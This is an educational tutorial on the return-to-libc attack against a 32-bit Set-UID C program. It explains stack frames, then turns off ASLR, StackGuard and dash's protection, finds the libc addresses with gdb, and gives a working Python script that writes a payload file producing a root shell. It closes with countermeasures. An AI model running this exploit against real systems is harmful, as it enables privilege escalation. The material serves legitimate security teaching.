# Return-to-libc attack

By exploiting a buffer overflow, an attacker can cause a program to jump to injected shellcode and execute it. To prevent this, some operating systems, such as Fedora Linux, allow system administrators to make stacks non-executable, so that jumping to the shellcode causes the program to fail.

Unfortunately, this protection scheme is not foolproof. There is another type of attack, the **return-to-libc attack**, which does not need an executable stack; it does not even use shellcode. Instead, it causes the vulnerable program to jump to existing code, such as the `system()` function in the `libc` library, which is already loaded into memory.

## Prerequisites

### The `system` function

The `system` function is part of the `libc` library. The way it works is simple: it first starts a new shell process and passes its first argument to that shell as a command, which the shell then executes.

What makes `system` dangerous is that the invoked shell has the same effective user ID as its parent process. Therefore, if `system("/bin/sh")` is called in a privileged program, the invoked shell runs with that privilege, and so does every command it executes. For example, a malicious user who manages to call `system("/bin/sh")` in a Set-UID program obtains a privileged shell and can use it to harm the system.

![](https://i.imgur.com/BE6o6oD.png)

### Activation record

Every function invocation has its own region of the stack, and this region has a fixed structure. It is called the activation record.

The structure of the activation record is simple. We place our origin at the address held in the `ebp` register. That location stores the previous `ebp` value (the caller's frame pointer). Right above it, at higher addresses, is the return address, followed by the first argument of the function, then the second, the third, and so on. Right below it is the first local variable, then the second, the third, and so on.
For example, if we have this function

```C++
void ARDemo (int k, int j, int i) {
    int a;
    float r;
    char c;
    bool b;
    short w;
    // ...
}
```

then its activation record while the function executes looks like the picture below:

![](https://i.imgur.com/tNEnBQU.gif)

### Function prologue and epilogue

To place an argument for the malicious function call in memory, we need to know exactly how a function's stack memory is allocated and deallocated. The compiler inserts a short piece of code at the entry and at the exit of every function for this purpose; these are called the function prologue and the function epilogue.

**Function prologue**: This assembly code runs every time a function is invoked:

```
pushl %ebp         // Save caller's frame pointer
movl %esp, %ebp    // Set callee's frame pointer
subl $N, %esp      // Reserve space for the local variables
```

Before this code runs, the return address (denoted as `RA`) has already been pushed onto the stack, and the stack pointer `esp` points to it. The first instruction, `pushl %ebp`, pushes the previous frame pointer (the caller's `ebp`) onto the stack, so that the caller's frame pointer can be recovered when the function returns. The second instruction sets `ebp` to the current value of `esp`, which makes it the frame pointer of the current frame. The third instruction moves `esp` down by $N$ bytes to reserve space for the function's local variables.

![](https://i.imgur.com/kLHFN3L.png)

**Function epilogue**: Like the prologue, the function epilogue runs every time the function returns:

```
movl %ebp, %esp
popl %ebp
ret
```

It undoes what the prologue did, so that the caller's context is restored. The first instruction moves the stack pointer back to the frame pointer, which releases the space of the local variables. The next instruction restores `ebp` to its previous value. The last instruction pops the return address from the stack and jumps to it.

![](https://i.imgur.com/MjdFKrP.png)

## How does the attack happen?
### Overview

There is a region in memory where plenty of code can be found: the region that holds the standard C library functions. On Linux, this library is called `libc`, and it is a dynamically linked library. Most programs use functions from `libc`, so the operating system loads the library into memory before these programs start running.

So which function in `libc` can help attackers achieve their malicious goal? Several such functions exist; the easiest one to use is `system()`. It simply starts a new shell and has that shell execute the string it is given as an argument. We therefore only need to pass the string `"/bin/sh"` to `system()`, and it will spawn a new privileged shell, because the parent process is a Set-UID program.

Besides `system()`, many other functions can be used to harm the system, such as `execv()` and `setuid()`.

### Experiment

Since the return-to-libc attack is much more difficult on a 64-bit machine than on a 32-bit one, we demonstrate it on a 32-bit machine for simplicity. Assume that we have the following program:

```C++
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

#ifndef BUF_SIZE
#define BUF_SIZE 12
#endif

int bof(char *str)
{
    char buffer[BUF_SIZE];
    unsigned int *framep;    // unused in this example

    // Vulnerable: strcpy does not check that str fits into buffer
    strcpy(buffer, str);

    return 1;
}

int main(int argc, char **argv)
{
    char input[1000];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    if (badfile == NULL) {   // badfile must exist, even if it is empty
        perror("badfile");
        return 1;
    }
    int length = fread(input, sizeof(char), 1000, badfile);
    bof(input);

    return 1;
}
```

This program is vulnerable. First, it reads up to $1000$ bytes from the file named `badfile` into `input`. Then it passes `input` to the `bof` function as `str`, and `strcpy` copies `str` into the local variable `buffer` without checking its length. However, `buffer` holds only `12` bytes, so any longer input overflows it.
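
To make the overflow concrete, the following Python sketch models what `strcpy` does to the stack frame of `bof`. It is a simplified illustration, not the real memory layout: it assumes that the saved `ebp` and the return address sit directly after the 12-byte buffer (a real compiler may insert padding), and the helper names `make_frame`, `c_strcpy`, and `return_address`, as well as the stored values, are made up for this example.

```python
BUF_SIZE = 12                                     # same size as buffer in the C program
SAVED_EBP = slice(BUF_SIZE, BUF_SIZE + 4)         # assumed: directly after buffer
RETURN_ADDR = slice(BUF_SIZE + 4, BUF_SIZE + 8)   # assumed: directly after saved ebp
FRAME_SIZE = BUF_SIZE + 12                        # buffer, saved ebp, return address, one argument slot


def make_frame() -> bytearray:
    """Build a toy frame filled with recognizable, made-up values."""
    frame = bytearray(FRAME_SIZE)
    frame[SAVED_EBP] = (0x11111111).to_bytes(4, "little")
    frame[RETURN_ADDR] = (0x22222222).to_bytes(4, "little")
    return frame


def c_strcpy(frame: bytearray, src: bytes) -> None:
    """Copy src to the start of frame like strcpy: stop after the first NUL, no bounds check."""
    nul = src.find(b"\x00")
    end = len(src) if nul == -1 else nul + 1
    frame[0:end] = src[:end]


def return_address(frame: bytearray) -> int:
    """Read the 4-byte little-endian return address stored in the toy frame."""
    return int.from_bytes(frame[RETURN_ADDR], "little")


short_frame = make_frame()
c_strcpy(short_frame, b"hello\x00")            # fits into the 12-byte buffer
print(hex(return_address(short_frame)))        # 0x22222222 (unchanged)

long_frame = make_frame()
payload = b"A" * 16 + (0xdeadbeef).to_bytes(4, "little") + b"\x00"
c_strcpy(long_frame, payload)                  # 21 bytes copied into a 12-byte buffer
print(hex(return_address(long_frame)))         # 0xdeadbeef (overwritten)
```

A short input leaves the return address untouched, while an input longer than the buffer replaces it with bytes chosen by whoever wrote the file. This is the mechanism the rest of the experiment relies on.
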
Assume that the program has been compiled with the option `-z noexecstack` (which makes the stack non-executable), so we cannot inject shellcode and jump to it. This is where the return-to-libc attack comes in. The attack consists of $4$ steps:

1. Find the address of `system()` function
2. Find the address of `"/bin/sh"`
3. Find where exactly we should place the address
4. Generate `badfile` content and perform the attack

#### Setup

For this experiment, some countermeasures need to be turned off.

- Address Space Randomization
  ```
  $ sudo sysctl -w kernel.randomize_va_space=0
  ```
- The StackGuard Protection Scheme
  ```
  $ gcc -m32 -fno-stack-protector example.c
  ```
- Configuring `/bin/sh`: In Ubuntu 20.04, the `/bin/sh` symbolic link points to the `/bin/dash` shell. The `dash` shell has a countermeasure that prevents it from being executed in a Set-UID process. Therefore, we have to link `/bin/sh` to `/bin/zsh` instead:
  ```
  $ sudo ln -sf /bin/zsh /bin/sh
  ```

#### Step 1: Find the address of `system()` function

In Linux, the `libc` library is loaded into the program's memory at runtime. When address space randomization is turned off, the library is loaded at the same address every time the same program runs (although the address can differ between programs). Therefore, we can easily find the address of `system()` with a debugging tool such as `gdb`.

First, we create an empty `badfile` for debugging:

```
$ touch badfile
```

Next, we compile the program with the debug flag `-g`. Remember to add the option `-m32` to compile for the 32-bit architecture, together with the options that turn off the countermeasures:

```
$ gcc -m32 -fno-stack-protector -z noexecstack -g -o retlib_dbg retlib.c
```

Then we make the program a Set-UID program. Note that even for the same program, if we change it from a Set-UID program to a non-Set-UID program, the `libc` library may not be loaded at the same location.
Therefore, when we debug the program, we need to debug the target Set-UID program:

```
$ sudo chown root retlib_dbg
$ sudo chmod 4755 retlib_dbg
```

After that, we open the program in `gdb`, set a breakpoint at the `main` function, run the program, and print the address of `system`:

```
$ gdb -q retlib_dbg
gdb-peda$ b main
Breakpoint 1 at 0x12ef: file retlib.c, line 33
gdb-peda$ run
gdb-peda$ p system
0xf7e12420
```

#### Step 2: Find the address of `"/bin/sh"`

Now that we have the address of `system()`, we need the address of its argument, the string `"/bin/sh"`, since we want to call `system("/bin/sh")` to get a privileged shell. There are many ways to achieve this; we use an environment variable. We define a new shell variable `MYSHELL` with the value `/bin/sh` and export it, so that it becomes an environment variable of the programs started from this shell:

```
$ export MYSHELL=/bin/sh
```

The location of this variable in memory can be found with the following program:

```C++
#include <stdio.h>
#include <stdlib.h>

int main(void) {
    char *shell = getenv("MYSHELL");
    if (shell)
        printf("%x\n", (unsigned int)shell);  // address of the string in this process
    return 0;
}
```

Compile the code above into a binary called `prtenv`. The name of this program must have the same number of characters as the name of the target program (here `retlib`), because the program name is pushed onto the stack before the environment variables, so names of different lengths shift the addresses of the environment variables:

```
$ gcc -m32 -o prtenv prtenv.c
```

Running the program prints the address of the string we need:

```
$ ./prtenv
ffffd0d7
```

#### Step 3: Find where exactly we should place the address

First, we need to know the distance from `buffer` to the location that `ebp` points to.
We can find it easily by debugging the program:

```
$ gdb -q retlib_dbg
gdb-peda$ b bof
gdb-peda$ run
gdb-peda$ next
gdb-peda$ p $ebp
0xffffc9c8
gdb-peda$ p &buffer
0xffffc9b0
gdb-peda$ p/d 0xffffc9c8 - 0xffffc9b0
24
```

The return address is stored right after the saved `ebp`, so the address of `system()` must be placed at offset `24 + 4 = 28` of the input string.

When the epilogue of `bof` finishes, `ret` has popped the return address, so the stack pointer is at the address right above where the return address was stored. Execution then jumps to the prologue of `system()`. Its first instruction pushes the previous `ebp` onto the stack, which moves `esp` down by $4$ bytes, and its second instruction sets `ebp` to `esp`. At that point, based on the activation record structure, we know that right above `ebp` is the return address of `system()`, and above the return address are the function arguments, from first to last. We conclude that the address of `"/bin/sh"` must be placed at offset `28 + 4 + 4 = 36` of the input.

After `system()` returns, the program would jump to an invalid address unless we also supply a return address for `system()`. Therefore, we find the address of the `exit` function (in the same way as the address of `system`) and put it at offset `28 + 4 = 32` of the input.

The analysis above is visualized in this picture:

![](https://i.imgur.com/huSHNcZ.png)

#### Step 4: Generate `badfile` content and perform the attack

The last thing we have to do is construct the `badfile` content based on our analysis.
We will use a Python program to generate it:

```python
#!/usr/bin/env python3

# Fill content with non-zero values
content = bytearray(0xaa for i in range(300))

X = 36
sh_addr = 0xffffd2e7       # The address of "/bin/sh"; use the value prtenv prints on your system
content[X:X+4] = (sh_addr).to_bytes(4, byteorder='little')

Y = 28
system_addr = 0xf7e12420   # The address of system()
content[Y:Y+4] = (system_addr).to_bytes(4, byteorder='little')

Z = 32
exit_addr = 0xf7e04f80     # The address of exit()
content[Z:Z+4] = (exit_addr).to_bytes(4, byteorder='little')

# Save content to a file
with open("badfile", "wb") as f:
    f.write(content)
```

Finally, we run the script and then the vulnerable program. The `#` prompt indicates that we obtained a root shell:

```
$ python3 exploit.py
$ ./retlib
#
```

## Countermeasures

There are several ways to counter this attack.

The first is address space randomization: the OS changes the starting addresses of the heap, the stack, and the shared libraries every time the program runs. This makes it much harder to guess the address of `system()` and the other addresses the attack needs.

The second is StackGuard, a protection against stack buffer overflows implemented by the `gcc` compiler. With this protection enabled, the overflow of `buffer` is detected before `bof` returns, so the attack shown here does not work.

Next, the `/bin/dash` shell has a countermeasure that prevents it from running with privilege in a Set-UID process. If `dash` is executed in a Set-UID process, it immediately changes the effective user ID to the process's real user ID, essentially dropping its privilege.

The last one is ASCII armoring. With it, the system libraries (e.g. `libc`) are mapped at addresses that contain a `NULL` byte (`0x00`). When the payload is copied by a string-based function such as `strcpy`, the copy stops at this `NULL` byte, so the part of the payload that follows the library address never reaches the stack.
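
The effect of ASCII armoring on the payload from Step 4 can be illustrated with a short sketch. It reuses the offsets 28, 32, and 36 and the addresses from the exploit script. The armored addresses `0x00e12420` and `0x00e04f80` are invented for illustration, and `build_payload` and `bytes_copied_by_strcpy` are hypothetical helpers that only model the copy, not a real `strcpy`.

```python
def build_payload(system_addr: int, exit_addr: int, sh_addr: int) -> bytes:
    """Lay out the three addresses at offsets 28, 32 and 36 of a 300-byte file."""
    content = bytearray(0xaa for _ in range(300))
    content[28:32] = system_addr.to_bytes(4, byteorder="little")
    content[32:36] = exit_addr.to_bytes(4, byteorder="little")
    content[36:40] = sh_addr.to_bytes(4, byteorder="little")
    return bytes(content)


def bytes_copied_by_strcpy(payload: bytes) -> int:
    """Count the payload bytes copied before the first NUL (toy model of strcpy)."""
    nul = payload.find(b"\x00")
    # Without a NUL in the payload, the model simply reports the whole payload.
    return len(payload) if nul == -1 else nul


# Addresses as used in the exploit script
plain = build_payload(0xf7e12420, 0xf7e04f80, 0xffffd2e7)
# Hypothetical armored library addresses: the top byte is 0x00
armored = build_payload(0x00e12420, 0x00e04f80, 0xffffd2e7)

print(bytes_copied_by_strcpy(plain))    # 300
print(bytes_copied_by_strcpy(armored))  # 31
```

In the armored case the copy stops at offset 31, inside the first address, so the `exit()` address at offset 32 and the `"/bin/sh"` pointer at offset 36 are never written to the stack, and `system()` would not receive its argument.
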